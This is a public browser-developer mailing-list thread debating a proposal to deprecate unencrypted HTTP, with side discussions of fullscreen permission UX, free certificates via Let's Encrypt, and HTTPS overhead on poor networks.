On Mon, May 4, 2015 at 12:59 PM, Florian B=C3=B6sch <pyalot@gmail.com> wrot= e: > On Mon, May 4, 2015 at 8:06 PM, Eric Rescorla <ekr@rtfm.com> wrote: >> >> I'm going to refer you at this point to the W3C HTML design principles o= f >> priority of constituencies >> (http://www.w3.org/TR/html-design-principles/#priority-of-constituencies >> ). >> >> "In case of conflict, consider users over authors over implementors over >> specifiers over theoretical purity. In other words costs or difficulties= to >> the user should be given more weight than costs to authors; which in tur= n >> should be given more weight than costs to implementors; which should be >> given more weight than costs to authors of the spec itself, which should= be >> given more weight than those proposing changes for theoretical reasons >> alone. Of course, it is preferred to make things better for multiple >> constituencies at once." >> >> Again, we're happy to look at ways to ease this transition, but right no= w >> you're not offering any. >> > You've set out on a course that leaves no room to offer any. You're going > to break things. You've decided to break things and damn the consequences= .. > You've decided to synchronize breaking things so that users have no UA to > flee to. And you've decided to hide your breaking of things so that the > shitstorm isn't going to come all at once. You're trying to delegate the > cost to fix things you broke for users, to authors, which in many cases > cannot burden that cost, even if they wanted to. > > I, as an author, tell you that this isn't going to go over smoothly. In > fact, it's going to go over pretty terribly badly. Coercing everybody to > conform with your greater goal (tm) from a situation where many cannot > comply always does. > Thanks for clarifying that you're not interested in engaging at a technical level. Feel free to flame on. -Ekr
![]() |
0 |
![]() |
On Tue, May 5, 2015 at 6:04 AM, Martin Thomson <mt@mozilla.com> wrote: > On Mon, May 4, 2015 at 11:00 AM, Daniel Holbert <dholbert@mozilla.com> > wrote: > > (I think there's a strong case for disabling *persistent* fullscreen > > permission, for the reasons described in ekr's response to you here. I > > haven't seen any proposal for going beyond that, but I might've missed > it.) > > A little birdy told me that that is planned. > I'm currently working on fullscreen. I believe our current plan is neither disabling fullscreen on HTTP, nor disabling persistent permission of that. Instead, we're going to remove permission bit on fullscreen, which means website can always enter fullscreen as far as that is initiated from a user input. We plan to use some transition animation to make entering fullscreen obvious for users, so that they are free from the burden deciding whether a website is trustworthy. - Xidorn
![]() |
0 |
![]() |
On Mon, May 4, 2015 at 1:57 PM, Xidorn Quan <quanxunzhen@gmail.com> wrote: > On Tue, May 5, 2015 at 6:04 AM, Martin Thomson <mt@mozilla.com> wrote: > > > On Mon, May 4, 2015 at 11:00 AM, Daniel Holbert <dholbert@mozilla.com> > > wrote: > > > (I think there's a strong case for disabling *persistent* fullscreen > > > permission, for the reasons described in ekr's response to you here. I > > > haven't seen any proposal for going beyond that, but I might've missed > > it.) > > > > A little birdy told me that that is planned. > > > > I'm currently working on fullscreen. I believe our current plan is neither > disabling fullscreen on HTTP, nor disabling persistent permission of that. > > Instead, we're going to remove permission bit on fullscreen, which means > website can always enter fullscreen as far as that is initiated from a user > input. We plan to use some transition animation to make entering fullscreen > obvious for users, so that they are free from the burden deciding whether a > website is trustworthy. This is not what I gathered from the notes Richard Barnes forwarded me. Rather, I had the impression that we were going to make the animation more aggressive *and* require a permissions prompt every time for HTTP. Richard? -Ekr
![]() |
0 |
![]() |
We're adding UX to clearly indicate http:// or https:// in fullscreen while still meeting the user desire for secure one-click-to-fullscreen. The latest and greatest proposal posted here: https://bugzilla.mozilla.org/show_bug.cgi?id=1129061 --Jet On Mon, May 4, 2015 at 2:04 PM, Eric Rescorla <ekr@rtfm.com> wrote: > On Mon, May 4, 2015 at 1:57 PM, Xidorn Quan <quanxunzhen@gmail.com> wrote: > > > On Tue, May 5, 2015 at 6:04 AM, Martin Thomson <mt@mozilla.com> wrote: > > > > > On Mon, May 4, 2015 at 11:00 AM, Daniel Holbert <dholbert@mozilla.com> > > > wrote: > > > > (I think there's a strong case for disabling *persistent* fullscreen > > > > permission, for the reasons described in ekr's response to you > here. I > > > > haven't seen any proposal for going beyond that, but I might've > missed > > > it.) > > > > > > A little birdy told me that that is planned. > > > > > > > I'm currently working on fullscreen. I believe our current plan is > neither > > disabling fullscreen on HTTP, nor disabling persistent permission of > that. > > > > Instead, we're going to remove permission bit on fullscreen, which means > > website can always enter fullscreen as far as that is initiated from a > user > > input. We plan to use some transition animation to make entering > fullscreen > > obvious for users, so that they are free from the burden deciding > whether a > > website is trustworthy. > > > This is not what I gathered from the notes Richard Barnes forwarded me. > Rather, I had the impression that we were going to make the animation more > aggressive *and* require a permissions prompt every time for HTTP. > > Richard? > > -Ekr > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
Great! Without getting too deep into the exact details about animation / notifications / permissions, it sounds like Florian's concern RE "browsers want to disable fullscreen if you are not serving the website over HTTPS" may be unfounded, then. (Unless Florian or Martin have some extra information that we're missing.) ~Daniel On 05/04/2015 02:55 PM, Jet Villegas wrote: > We're adding UX to clearly indicate http:// or https:// in fullscreen > while still meeting the user desire for secure one-click-to-fullscreen. > The latest and greatest proposal posted here: > > https://bugzilla.mozilla.org/show_bug.cgi?id=1129061 > > --Jet > > On Mon, May 4, 2015 at 2:04 PM, Eric Rescorla <ekr@rtfm.com > <mailto:ekr@rtfm.com>> wrote: > > On Mon, May 4, 2015 at 1:57 PM, Xidorn Quan <quanxunzhen@gmail.com > <mailto:quanxunzhen@gmail.com>> wrote: > > > On Tue, May 5, 2015 at 6:04 AM, Martin Thomson <mt@mozilla.com <mailto:mt@mozilla.com>> wrote: > > > > > On Mon, May 4, 2015 at 11:00 AM, Daniel Holbert <dholbert@mozilla.com <mailto:dholbert@mozilla.com>> > > > wrote: > > > > (I think there's a strong case for disabling *persistent* fullscreen > > > > permission, for the reasons described in ekr's response to you here. I > > > > haven't seen any proposal for going beyond that, but I might've missed > > > it.) > > > > > > A little birdy told me that that is planned. > > > > > > > I'm currently working on fullscreen. I believe our current plan is neither > > disabling fullscreen on HTTP, nor disabling persistent permission of that. > > > > Instead, we're going to remove permission bit on fullscreen, which means > > website can always enter fullscreen as far as that is initiated from a user > > input. We plan to use some transition animation to make entering fullscreen > > obvious for users, so that they are free from the burden deciding whether a > > website is trustworthy. > > > This is not what I gathered from the notes Richard Barnes forwarded me. > Rather, I had the impression that we were going to make the > animation more > aggressive *and* require a permissions prompt every time for HTTP. > > Richard? > > -Ekr > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org <mailto:dev-platform@lists.mozilla.org> > https://lists.mozilla.org/listinfo/dev-platform > >
![]() |
0 |
![]() |
On Tue, May 5, 2015 at 12:03 AM, Daniel Holbert <dholbert@mozilla.com> wrote: > Without getting too deep into the exact details about animation / > notifications / permissions, it sounds like Florian's concern RE > "browsers want to disable fullscreen if you are not serving the website > over HTTPS" may be unfounded, then. > > (Unless Florian or Martin have some extra information that we're missing.) > I responded to OPs comment about restricting features (such as fullscreen), I have no more information than that. Yes, if the permission dialog could be done away with altogether and an appropriate UX could be done to make it difficult to miss the fullscreen change, and if that made it possible to have fullscreen functionality regardless of http or https that would make me happy. It would also take care of another UX concern of mine (permission dialog creep), particularly in the case of where an iframe with fullscreen functionality is embedded, and the youtube player for instance is re-polling permissions to go fullscreen on every domain it's embedded in (which from a users point of view just doesn't make any sense).
![]() |
0 |
![]() |
The additional expense of HTTPS arises from the significantly higher cost to the service owner of protecting it against attack, to maintain service Availability (that third side of the security CIA triangle that gets forgotten). Encryption should be activated only after BOTH parties have mutually authenticated. Why establish an encrypted transport to an unknown attacker? This might be done with mutual authentication in TLS (which nobody does) or creating a separate connection after identities are authenticated, or use an App with embedded identity. I'll be at RIPE70. Steve On Monday, April 13, 2015 at 3:57:58 PM UTC+1, Richard Barnes wrote: > There's pretty broad agreement that HTTPS is the way forward for the web. > In recent months, there have been statements from IETF [1], IAB [2], W3C > [3], and even the US Government [4] calling for universal use of > encryption, which in the case of the web means HTTPS. > > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security. > Broadly speaking, this plan would entail limiting new features to secure > contexts, followed by gradually removing legacy features from insecure > contexts. Having an overall program for HTTP deprecation makes a clear > statement to the web community that the time for plaintext is over -- it > tells the world that the new web uses HTTPS, so if you want to use new > things, you need to provide security. Martin Thomson and I drafted a > one-page outline of the plan with a few more considerations here: > > https://docs.google.com/document/d/1IGYl_rxnqEvzmdAP9AJQYY2i2Uy_sW-cg9QI9ICe-ww/edit?usp=sharing > > Some earlier threads on this list [5] and elsewhere [6] have discussed > deprecating insecure HTTP for "powerful features". We think it would be a > simpler and clearer statement to avoid the discussion of which features are > "powerful" and focus on moving all features to HTTPS, powerful or not. > > The goal of this thread is to determine whether there is support in the > Mozilla community for a plan of this general form. Developing a precise > plan will require coordination with the broader web community (other > browsers, web sites, etc.), and will probably happen in the W3C. > > Thanks, > --Richard > > [1] https://tools.ietf.org/html/rfc7258 > [2] > https://www.iab.org/2014/11/14/iab-statement-on-internet-confidentiality/ > [3] https://w3ctag.github.io/web-https/ > [4] https://https.cio.gov/ > [5] > https://groups.google.com/d/topic/mozilla.dev.platform/vavZdN4tX44/discussion > [6] > https://groups.google.com/a/chromium.org/d/topic/blink-dev/2LXKVWYkOus/discussion
![]() |
0 |
![]() |
On 2015-05-05 4:59 AM, snash@arbor.net wrote: > Encryption should be activated only after BOTH parties have mutually authenticated. > Why establish an encrypted transport to an unknown attacker? A web you have to uniquely identify yourself to participate in is really not open or free for an awful lot of people. And if we had a reliable way of identifying attacks and attackers at all, much less in some actionable way, this would all be a much simpler problem. It is, just as one example among thousands, impossible to know if your wifi is being sniffed or not. - mhoye
![]() |
0 |
![]() |
It's absolutely true for hosting yourself today. The only thing even slightly difficult is setting up dynamic dns. On Mon, May 4, 2015, at 06:01 AM, Gervase Markham wrote: > On 01/05/15 19:02, Matthew Phillips wrote: > > You must have missed my original email: > > It's paramount that the web remain a frictionless place where creating a > > website is dead simple. > > That is not true today of people who want to run their own hosting. So > people who want "frictionless" use blogspot.com, or one of the thousands > of equivalent sites in many different jurisdictions, to say what they > want to say. > > In an HTTPS future, such sites would simply provide HTTPS for their > users. > > Gerv > >
![]() |
0 |
![]() |
On Wed, May 6, 2015 at 2:04 PM, Matthew Phillips <matthew@matthewphillips.info> wrote: > It's absolutely true for hosting yourself today. The only thing even > slightly difficult is setting up dynamic dns. And in a future where certificates are issued without cost over a protocol there's no reason setting up a secure server yourself will be difficult. HTTP will not disappear overnight and we'll have plenty of times to get all the moving pieces in order to make this great and overall a better web for end users. (Who will have less impossible trust decisions to endure.) -- https://annevankesteren.nl/
![]() |
0 |
![]() |
On 05/01/2015 01:50 PM, oliver@omattos.com wrote: > When plans like this aren't rolled out across all browsers together, users inevitably come across a broken site and say "Firefox works with this site, but Safari gives a warning. Safari must be broken". Better security is punished. > > Having this determined by a browser release is also bad. "My up to date Firefox is broken, but my old Safari works. Updating breaks things and must be bad!". Secure practices are punished. > > All browsers could change their behaviour on a specific date and time. But that would lead to stampedes of webmasters having issues all at once. And if theres any unforeseen compatibility issue, you just broke the entire world. Not so great. > > So might I suggest the best rollout plan is to apply policies based on a hash of the origin and a timestamp. Ie. on a specific date, 1% of sites have the new policies enforced, while 99% do not. Then a month later, it's up to 51%, and another month later it's up to 100%. The proposal I understood from this thread involves breaking precisely 0% of existing sites. So the flag day would only be relevant to in-development sites using new features only available in development browser builds.
![]() |
0 |
![]() |
This is a good idea but a terrible implementation. I already need someone = else's approval (registrar) to run a website (unless I want visitors to rem= ember my IP addresses). NOW I will need ANOTHER someone to approve it as w= ell (the CA authority), (unless I want visitors to click around a bunch of = security "errors"). We shouldn't be ADDING authorities required to make websites. The web is o= pen and free and this proposal adds authority to a select few who can dicta= te whats a "valid" site and what isn't.
![]() |
0 |
![]() |
Can't people use Let's Encrypt to obtain a certificate for free without the usual CA run-around? https://letsencrypt.org/getting-started/ "Let=E2=80=99s Encrypt is a free, automated, and open certificate authority= brought to you by the non-profit Internet Security Research Group (ISRG)." On Tue, Dec 20, 2016 at 6:38 AM, <cody.wohlers@gmail.com> wrote: > This is a good idea but a terrible implementation. I already need someon= e > else's approval (registrar) to run a website (unless I want visitors to > remember my IP addresses). NOW I will need ANOTHER someone to approve it > as well (the CA authority), (unless I want visitors to click around a bun= ch > of security "errors"). > > We shouldn't be ADDING authorities required to make websites. The web is > open and free and this proposal adds authority to a select few who can > dictate whats a "valid" site and what isn't. > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
Absolutely! Let's Encrypt sounds awesome, super-easy, and the price is rig= ht. =20 But I'm thinking of cases like Lavabit where a judge forced the site operat= or to release the private key. Or the opposite - could a government restri= ct access to a site by forcing the CA to revoke certificates? I guess you = could just get another certificate from another CA but what if they are all= ordered to revoke you - like in some future world government or something.= ... This example is extreme but security is not about the norm, it's about the = fringe cases. I just wish we could have an encryption scheme that doesn't = need any third-party authority, before we start punishing those who don't u= se it. That's all. On Tuesday, 20 December 2016 10:47:33 UTC-7, Jim Blandy wrote: > Can't people use Let's Encrypt to obtain a certificate for free without t= he > usual CA run-around? >=20 > https://letsencrypt.org/getting-started/ >=20 > "Let=E2=80=99s Encrypt is a free, automated, and open certificate authori= ty brought > to you by the non-profit Internet Security Research Group (ISRG)." >=20 >=20
![]() |
0 |
![]() |
On Tue, Dec 20, 2016 at 10:28 AM, Cody Wohlers <cody.wohlers@gmail.com> wrote: > Absolutely! Let's Encrypt sounds awesome, super-easy, and the price is > right. > > But I'm thinking of cases like Lavabit where a judge forced the site > operator to release the private key. Or the opposite - could a governmen= t > restrict access to a site by forcing the CA to revoke certificates? I > guess you could just get another certificate from another CA but what if > they are all ordered to revoke you - like in some future world government > or something... > Certainly a government could do that, but it's easier to just go after the DNS. This example is extreme but security is not about the norm, it's about the > fringe cases. I just wish we could have an encryption scheme that doesn'= t > need any third-party authority, before we start punishing those who don't > use it. That's all. > As long as sites are identified by domain names and want those names to be tied to real world identities, I don't see anything like that one the horizon (i.e., I'm not aware of any technology which would let you do it). -Ekr > On Tuesday, 20 December 2016 10:47:33 UTC-7, Jim Blandy wrote: > > Can't people use Let's Encrypt to obtain a certificate for free without > the > > usual CA run-around? > > > > https://letsencrypt.org/getting-started/ > > > > "Let=E2=80=99s Encrypt is a free, automated, and open certificate autho= rity > brought > > to you by the non-profit Internet Security Research Group (ISRG)." > > > > > > > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
Richard Barnes wrote: > There's pretty broad agreement that HTTPS is the way forward for the web. > In recent months, there have been statements from IETF [1], IAB [2], W3C > [3], and even the US Government [4] calling for universal use of > encryption, which in the case of the web means HTTPS. > > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security. With all due respects, the HTTP->HTTPS *isn't* entirely a web developer's choice; but the web server administration choice (unless the person is wearing both hats). Just because the US Government is calling for encryption (i.e. HTTPS over HTTP), it doesn't mean people can and/or will do it. Why? Why do people need to be forced to use HTTPS when it's overkill for their website? I mean.. would a run-of-the-mill-with-no-shopping require HTTPS? Like, i.e http://www.ambrosia-oysterbar.com/catalog/index.php HTTPS is a secured method of transporting information. For the above website, https would mean absolutely no sense and would be akin to getting BRINKS to transporting a T-bone steak dinner to you. Can you do that? Sure possibly if BRINKS doesn't ignore you right out. Why would you do that? Like everything, HTTPS is a tool and it's a bad idea to force people to use HTTPS when they don't need it. When do they need it? Who decides when they need it? Certainly not you, or anyone else other than themselves. So like the NetworkInterface issue... please stop wasting resources doing these 'busy' things when you can be doing something else that gives more choice to the user. I mean.. doing the things right vs. doing the right things and I believe it was the late Peter Drucker that wrote that. > Broadly speaking, this plan would entail limiting new features to secure > contexts, followed by gradually removing legacy features from insecure > contexts. Having an overall program for HTTP deprecation makes a clear > statement to the web community that the time for plaintext is over -- it There is nothing wrong with plaintext just as long as it isn't something credential-like. Also, what you're doing will only make a clear statement to the web community that you are forcing something on them and limiting THEIR choices of broadcasting their information as they see fit. IOW, "deprecating HTTP" is not a good idea. :ewong
![]() |
0 |
![]() |
On 12/20/2016 06:20 PM, Edmund Wong wrote: > Richard Barnes wrote: > >> Broadly speaking, this plan would entail limiting new features to secure >> contexts, followed by gradually removing legacy features from insecure >> contexts. Having an overall program for HTTP deprecation makes a clear >> statement to the web community that the time for plaintext is over -- it > There is nothing wrong with plaintext just as long as it isn't something > credential-like. Also, what you're doing will only make a clear > statement to the web community that you are forcing something on them > and limiting THEIR choices of broadcasting their information as they > see fit. > > IOW, "deprecating HTTP" is not a good idea. If I have a browser exploit that I can embed in a <script> tag, I can inject it into all of the HTTP network traffic on my LAN. Not so nice if visiting an HTTP website at Starbucks or the public library gets you pwned.
![]() |
0 |
![]() |
Steve Fink wrote: > On 12/20/2016 06:20 PM, Edmund Wong wrote: >> Richard Barnes wrote: >> >>> Broadly speaking, this plan would entail limiting new features to >>> secure >>> contexts, followed by gradually removing legacy features from insecure >>> contexts. Having an overall program for HTTP deprecation makes a clear >>> statement to the web community that the time for plaintext is over -- it >> There is nothing wrong with plaintext just as long as it isn't something >> credential-like. Also, what you're doing will only make a clear >> statement to the web community that you are forcing something on them >> and limiting THEIR choices of broadcasting their information as they >> see fit. >> >> IOW, "deprecating HTTP" is not a good idea. > > If I have a browser exploit that I can embed in a <script> tag, I can > inject it into all of the HTTP network traffic on my LAN. Not so nice if > visiting an HTTP website at Starbucks or the public library gets you pwned. > Point taken. Someone could just as well crack into a server that has HTTPS and hijack it to inject HTTPS-enabled browser exploits. Sure, it's not as simple as injecting it in HTTP traffic, but that still could happen. No amount of HTTPS could prevent your system being pwned, which is why defense in layers is the best security. In any event, the choice is Mozilla's. Edmund
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 10:57:58 AM UTC-4, Richard Barnes wrote: > There's pretty broad agreement that HTTPS is the way forward for the web. > In recent months, there have been statements from IETF [1], IAB [2], W3C > [3], and even the US Government [4] calling for universal use of > encryption, which in the case of the web means HTTPS. >=20 > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security= .. > Broadly speaking, this plan would entail limiting new features to secure > contexts, followed by gradually removing legacy features from insecure > contexts. Having an overall program for HTTP deprecation makes a clear > statement to the web community that the time for plaintext is over -- it > tells the world that the new web uses HTTPS, so if you want to use new > things, you need to provide security. Martin Thomson and I drafted a > one-page outline of the plan with a few more considerations here: For Devs who claim to be crusaders of standards, your standards last little= more than 1 financial cycle until deprecated and 2 years until removed. TL= S has observable overhead (more round trips) on all 2G-4G connections vs an= equivalent cleartext HTTP 1.1. For privileged developers who carry venture= capital funded client test devices and the most expensive dev machines tha= t money can buy funded by Wall Street money, it is easy to throw away all u= sers who live in developing nations on budget client hardware or lowest tie= r 3G or 4G networks. Cleartext has a place, and until HTTP2/QUIC can get ro= und trips and packet size to old cleartext ways on high packet loss, 2G or = satellite, or the worst monopoly "State Post and Telegraph" 3G mobile netwo= rks, HTTPS should only be used for sensitive data or stateful queries.
![]() |
0 |
![]() |
You're replying to a 4 year old thread. Don't do that: you're jumping over 4 years of other conversations, and tagged on the end of an old thread whatever arguments you're making will unseen by a lot of people depending on how their mail readers work. Your arguments about HTTPS overhead on poor networks make some sense, but that tiny amount of data is completely swamped by the average size of a single image these days, let alone an entire page. > HTTPS should only be used for sensitive data or stateful queries. What we've learned from "surveillance capitalism" over the past several years is that it is _all_ sensitive data. -Dan Veditz
![]() |
0 |
![]() |